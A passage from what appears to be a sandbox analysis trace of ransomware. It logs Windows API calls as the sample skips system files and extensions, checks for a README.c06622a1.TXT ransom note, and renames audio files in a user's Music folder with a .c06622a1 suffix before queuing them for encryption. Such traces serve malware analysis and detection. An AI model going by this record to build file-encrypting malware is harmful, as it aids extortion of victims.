_wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0150.598] wcslen (_String="rom") returned 0x3 [0150.598] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0150.598] wcslen (_String="rtp") returned 0x3 [0150.598] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0150.598] wcslen (_String="scr") returned 0x3 [0150.598] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0150.599] wcslen (_String="shs") returned 0x3 [0150.599] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0150.599] wcslen (_String="spl") returned 0x3 [0150.599] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0150.599] wcslen (_String="sys") returned 0x3 [0150.599] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0150.599] wcslen (_String="theme") returned 0x5 [0150.599] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0150.599] wcslen (_String="themepack") returned 0x9 [0150.599] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0150.599] wcslen (_String="wpx") returned 0x3 [0150.599] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0150.599] wcslen (_String="lock") returned 0x4 [0150.599] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0150.599] wcslen (_String="key") returned 0x3 [0150.599] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0150.599] wcslen (_String="hta") returned 0x3 [0150.599] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0150.599] wcslen (_String="msi") returned 0x3 [0150.599] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0150.599] wcslen (_String="pdb") returned 0x3 [0150.599] _wcsicmp (_Str1="sql", _Str2="m4a") returned 6 [0150.599] wcslen (_String="sql") returned 0x3 [0150.599] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0150.599] wcslen (_String="sqlite") returned 0x6 [0150.599] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia")) returned 0x10 [0150.599] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45900d8 [0150.600] wcscpy (in: _Dest=0x45900d8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" [0150.600] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA") returned 0x69 [0150.600] wcscpy (in: _Dest=0x45901ac, _Source="16h-.m4a" | out: _Dest="16h-.m4a") returned="16h-.m4a" [0150.600] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\16h-.m4a", dwFileAttributes=0x80) returned 1 [0150.600] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\16h-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\16h-.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0150.600] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.600] ReadFile (in: hFile=0x368, lpBuffer=0x3fe174, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe204, lpOverlapped=0x0 | out: lpBuffer=0x3fe174*, lpNumberOfBytesRead=0x3fe204*=0x90, lpOverlapped=0x0) returned 1 [0150.601] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe174, Length=0x80) returned 0xb90d0390 [0150.601] RtlComputeCrc32 (PartialCrc=0x390, Buffer=0x3fe174, Length=0x80) returned 0x13de31d0 [0150.601] RtlComputeCrc32 (PartialCrc=0x31d0, Buffer=0x3fe174, Length=0x80) returned 0xe35a5ba9 [0150.601] RtlComputeCrc32 (PartialCrc=0x5ba9, Buffer=0x3fe174, Length=0x80) returned 0xc6b14590 [0150.601] RtlComputeCrc32 (PartialCrc=0x4590, Buffer=0x3fe174, Length=0x80) returned 0x2395f845 [0150.601] CloseHandle (hObject=0x368) returned 1 [0150.601] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45a00e0 [0150.601] wcscpy (in: _Dest=0x45a00e0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\16h-.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\16h-.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\16h-.m4a" [0150.601] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\16h-.m4a") returned 0x72 [0150.601] wcscpy (in: _Dest=0x45a01c4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.601] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\16h-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\16h-.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\16h-.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\16h-.m4a.c06622a1"), dwFlags=0x8) returned 1 [0150.604] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\16h-.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\16h-.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x368 [0150.604] CreateIoCompletionPort (FileHandle=0x368, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0150.604] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x41f0020 [0150.609] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x59ae6ac2 [0150.609] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2c46bc07 [0150.609] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x735d05e6 [0150.609] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x42ece6be [0150.609] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x229f8a13 [0150.609] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x60d143d3 [0150.609] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3dcf1d81 [0150.609] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x327919c4 [0150.612] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x41f0094, Length=0x80) returned 0xea9d7a2a [0150.612] RtlComputeCrc32 (PartialCrc=0x7a2a, Buffer=0x41f0094, Length=0x80) returned 0x24a399ec [0150.612] RtlComputeCrc32 (PartialCrc=0x99ec, Buffer=0x41f0094, Length=0x80) returned 0xb13e95d9 [0150.612] RtlComputeCrc32 (PartialCrc=0x95d9, Buffer=0x41f0094, Length=0x80) returned 0x4ce6548 [0150.613] RtlComputeCrc32 (PartialCrc=0x6548, Buffer=0x41f0094, Length=0x80) returned 0xa59a6818 [0150.613] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0150.613] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45900d8) returned 1 [0150.613] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45a00e0) returned 1 [0150.613] FindNextFileW (in: hFindFile=0x2db8840, lpFindFileData=0x3fe2ec | out: lpFindFileData=0x3fe2ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x462ca630, ftCreationTime.dwHighDateTime=0x1d5e167, ftLastAccessTime.dwLowDateTime=0xfb49f060, ftLastAccessTime.dwHighDateTime=0x1d5de04, ftLastWriteTime.dwLowDateTime=0xfb49f060, ftLastWriteTime.dwHighDateTime=0x1d5de04, nFileSizeHigh=0x0, nFileSizeLow=0x13861, dwReserved0=0x0, dwReserved1=0x0, cFileName="8iN6PgHsN.wav", cAlternateFileName="8IN6PG~1.WAV")) returned 1 [0150.613] _wcsicmp (_Str1="8iN6PgHsN.wav", _Str2="README.c06622a1.TXT") returned -58 [0150.613] wcsstr (_Str="8iN6PgHsN.wav", _SubStr="README") returned 0x0 [0150.613] _wcsicmp (_Str1="autorun.inf", _Str2="8iN6PgHsN.wav") returned 41 [0150.613] wcslen (_String="autorun.inf") returned 0xb [0150.613] _wcsicmp (_Str1="boot.ini", _Str2="8iN6PgHsN.wav") returned 42 [0150.613] wcslen (_String="boot.ini") returned 0x8 [0150.613] _wcsicmp (_Str1="bootfont.bin", _Str2="8iN6PgHsN.wav") returned 42 [0150.613] wcslen (_String="bootfont.bin") returned 0xc [0150.613] _wcsicmp (_Str1="bootsect.bak", _Str2="8iN6PgHsN.wav") returned 42 [0150.613] wcslen (_String="bootsect.bak") returned 0xc [0150.613] _wcsicmp (_Str1="desktop.ini", _Str2="8iN6PgHsN.wav") returned 44 [0150.613] wcslen (_String="desktop.ini") returned 0xb [0150.613] _wcsicmp (_Str1="iconcache.db", _Str2="8iN6PgHsN.wav") returned 49 [0150.613] wcslen (_String="iconcache.db") returned 0xc [0150.613] _wcsicmp (_Str1="ntldr", _Str2="8iN6PgHsN.wav") returned 54 [0150.613] wcslen (_String="ntldr") returned 0x5 [0150.613] _wcsicmp (_Str1="ntuser.dat", _Str2="8iN6PgHsN.wav") returned 54 [0150.613] wcslen (_String="ntuser.dat") returned 0xa [0150.613] _wcsicmp (_Str1="ntuser.dat.log", _Str2="8iN6PgHsN.wav") returned 54 [0150.613] wcslen (_String="ntuser.dat.log") returned 0xe [0150.613] _wcsicmp (_Str1="ntuser.ini", _Str2="8iN6PgHsN.wav") returned 54 [0150.613] wcslen (_String="ntuser.ini") returned 0xa [0150.613] _wcsicmp (_Str1="thumbs.db", _Str2="8iN6PgHsN.wav") returned 60 [0150.613] wcslen (_String="thumbs.db") returned 0x9 [0150.613] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0150.613] wcslen (_String="386") returned 0x3 [0150.613] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0150.613] wcslen (_String="adv") returned 0x3 [0150.613] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0150.613] wcslen (_String="ani") returned 0x3 [0150.614] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0150.614] wcslen (_String="bat") returned 0x3 [0150.614] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0150.614] wcslen (_String="bin") returned 0x3 [0150.614] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0150.614] wcslen (_String="cab") returned 0x3 [0150.614] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0150.614] wcslen (_String="cmd") returned 0x3 [0150.614] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0150.614] wcslen (_String="com") returned 0x3 [0150.614] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0150.614] wcslen (_String="cpl") returned 0x3 [0150.614] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0150.614] wcslen (_String="cur") returned 0x3 [0150.614] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0150.614] wcslen (_String="deskthemepack") returned 0xd [0150.614] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0150.614] wcslen (_String="diagcab") returned 0x7 [0150.614] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0150.614] wcslen (_String="diagcfg") returned 0x7 [0150.614] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0150.614] wcslen (_String="diagpkg") returned 0x7 [0150.614] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0150.614] wcslen (_String="dll") returned 0x3 [0150.614] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0150.614] wcslen (_String="drv") returned 0x3 [0150.614] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0150.614] wcslen (_String="exe") returned 0x3 [0150.614] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0150.614] wcslen (_String="hlp") returned 0x3 [0150.614] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0150.614] wcslen (_String="icl") returned 0x3 [0150.614] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0150.614] wcslen (_String="icns") returned 0x4 [0150.614] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0150.614] wcslen (_String="ico") returned 0x3 [0150.614] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0150.615] wcslen (_String="ics") returned 0x3 [0150.615] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0150.615] wcslen (_String="idx") returned 0x3 [0150.615] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0150.615] wcslen (_String="ldf") returned 0x3 [0150.615] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0150.615] wcslen (_String="lnk") returned 0x3 [0150.615] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0150.615] wcslen (_String="mod") returned 0x3 [0150.615] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0150.615] wcslen (_String="mpa") returned 0x3 [0150.615] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0150.615] wcslen (_String="msc") returned 0x3 [0150.615] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0150.615] wcslen (_String="msp") returned 0x3 [0150.615] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0150.615] wcslen (_String="msstyles") returned 0x8 [0150.615] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0150.615] wcslen (_String="msu") returned 0x3 [0150.615] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0150.615] wcslen (_String="nls") returned 0x3 [0150.615] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0150.615] wcslen (_String="nomedia") returned 0x7 [0150.615] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0150.615] wcslen (_String="ocx") returned 0x3 [0150.615] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 [0150.615] wcslen (_String="prf") returned 0x3 [0150.615] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0150.615] wcslen (_String="ps1") returned 0x3 [0150.615] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0150.615] wcslen (_String="rom") returned 0x3 [0150.615] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0150.615] wcslen (_String="rtp") returned 0x3 [0150.615] _wcsicmp (_Str1="scr", _Str2="wav") returned -4 [0150.615] wcslen (_String="scr") returned 0x3 [0150.615] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0150.615] wcslen (_String="shs") returned 0x3 [0150.616] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0150.616] wcslen (_String="spl") returned 0x3 [0150.616] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0150.616] wcslen (_String="sys") returned 0x3 [0150.616] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0150.616] wcslen (_String="theme") returned 0x5 [0150.616] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0150.616] wcslen (_String="themepack") returned 0x9 [0150.616] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0150.616] wcslen (_String="wpx") returned 0x3 [0150.616] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0150.616] wcslen (_String="lock") returned 0x4 [0150.616] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0150.616] wcslen (_String="key") returned 0x3 [0150.616] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0150.616] wcslen (_String="hta") returned 0x3 [0150.616] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0150.616] wcslen (_String="msi") returned 0x3 [0150.616] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0150.616] wcslen (_String="pdb") returned 0x3 [0150.616] _wcsicmp (_Str1="sql", _Str2="wav") returned -4 [0150.616] wcslen (_String="sql") returned 0x3 [0150.616] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0150.616] wcslen (_String="sqlite") returned 0x6 [0150.616] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia")) returned 0x10 [0150.616] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45900d8 [0150.616] wcscpy (in: _Dest=0x45900d8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" [0150.616] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA") returned 0x69 [0150.616] wcscpy (in: _Dest=0x45901ac, _Source="8iN6PgHsN.wav" | out: _Dest="8iN6PgHsN.wav") returned="8iN6PgHsN.wav" [0150.616] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\8iN6PgHsN.wav", dwFileAttributes=0x80) returned 1 [0150.617] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\8iN6PgHsN.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\8in6pghsn.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x66c [0150.617] SetFilePointerEx (in: hFile=0x66c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.617] ReadFile (in: hFile=0x66c, lpBuffer=0x3fe174, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe204, lpOverlapped=0x0 | out: lpBuffer=0x3fe174*, lpNumberOfBytesRead=0x3fe204*=0x90, lpOverlapped=0x0) returned 1 [0150.618] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe174, Length=0x80) returned 0x88435bcd [0150.618] RtlComputeCrc32 (PartialCrc=0x5bcd, Buffer=0x3fe174, Length=0x80) returned 0x2842a98b [0150.618] RtlComputeCrc32 (PartialCrc=0xa98b, Buffer=0x3fe174, Length=0x80) returned 0x767ee6bb [0150.618] RtlComputeCrc32 (PartialCrc=0xe6bb, Buffer=0x3fe174, Length=0x80) returned 0x85fe9b8b [0150.618] RtlComputeCrc32 (PartialCrc=0x9b8b, Buffer=0x3fe174, Length=0x80) returned 0xeb43635 [0150.618] CloseHandle (hObject=0x66c) returned 1 [0150.618] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45a00e0 [0150.618] wcscpy (in: _Dest=0x45a00e0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\8iN6PgHsN.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\8iN6PgHsN.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\8iN6PgHsN.wav" [0150.618] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\8iN6PgHsN.wav") returned 0x77 [0150.618] wcscpy (in: _Dest=0x45a01ce, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.618] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\8iN6PgHsN.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\8in6pghsn.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\8iN6PgHsN.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\8in6pghsn.wav.c06622a1"), dwFlags=0x8) returned 1 [0150.621] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\8iN6PgHsN.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\8in6pghsn.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x66c [0150.621] CreateIoCompletionPort (FileHandle=0x66c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0150.621] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4280020 [0150.626] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x78f394c0 [0150.626] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x496f0217 [0150.626] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2b13498b [0150.626] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x719fd5b [0150.626] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x714499 [0150.626] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2ebd6666 [0150.626] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x10b1f427 [0150.626] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5d257fa8 [0150.629] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4280094, Length=0x80) returned 0x3cf3b8d0 [0150.629] RtlComputeCrc32 (PartialCrc=0xb8d0, Buffer=0x4280094, Length=0x80) returned 0xe3ee8247 [0150.630] RtlComputeCrc32 (PartialCrc=0x8247, Buffer=0x4280094, Length=0x80) returned 0x43f9d364 [0150.630] RtlComputeCrc32 (PartialCrc=0xd364, Buffer=0x4280094, Length=0x80) returned 0x14ad4361 [0150.630] RtlComputeCrc32 (PartialCrc=0x4361, Buffer=0x4280094, Length=0x80) returned 0xfcb0d71 [0150.630] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0150.630] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45900d8) returned 1 [0150.630] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45a00e0) returned 1 [0150.630] FindNextFileW (in: hFindFile=0x2db8840, lpFindFileData=0x3fe2ec | out: lpFindFileData=0x3fe2ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2205ea60, ftCreationTime.dwHighDateTime=0x1d5dcfc, ftLastAccessTime.dwLowDateTime=0x4e130890, ftLastAccessTime.dwHighDateTime=0x1d5dcb1, ftLastWriteTime.dwLowDateTime=0x4e130890, ftLastWriteTime.dwHighDateTime=0x1d5dcb1, nFileSizeHigh=0x0, nFileSizeLow=0xb2cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="BET3vPa5NoXZqsdKFh.m4a", cAlternateFileName="BET3VP~1.M4A")) returned 1 [0150.630] _wcsicmp (_Str1="BET3vPa5NoXZqsdKFh.m4a", _Str2="README.c06622a1.TXT") returned -16 [0150.630] wcsstr (_Str="BET3vPa5NoXZqsdKFh.m4a", _SubStr="README") returned 0x0 [0150.630] _wcsicmp (_Str1="autorun.inf", _Str2="BET3vPa5NoXZqsdKFh.m4a") returned -1 [0150.630] wcslen (_String="autorun.inf") returned 0xb [0150.630] _wcsicmp (_Str1="boot.ini", _Str2="BET3vPa5NoXZqsdKFh.m4a") returned 10 [0150.630] wcslen (_String="boot.ini") returned 0x8 [0150.630] _wcsicmp (_Str1="bootfont.bin", _Str2="BET3vPa5NoXZqsdKFh.m4a") returned 10 [0150.630] wcslen (_String="bootfont.bin") returned 0xc [0150.630] _wcsicmp (_Str1="bootsect.bak", 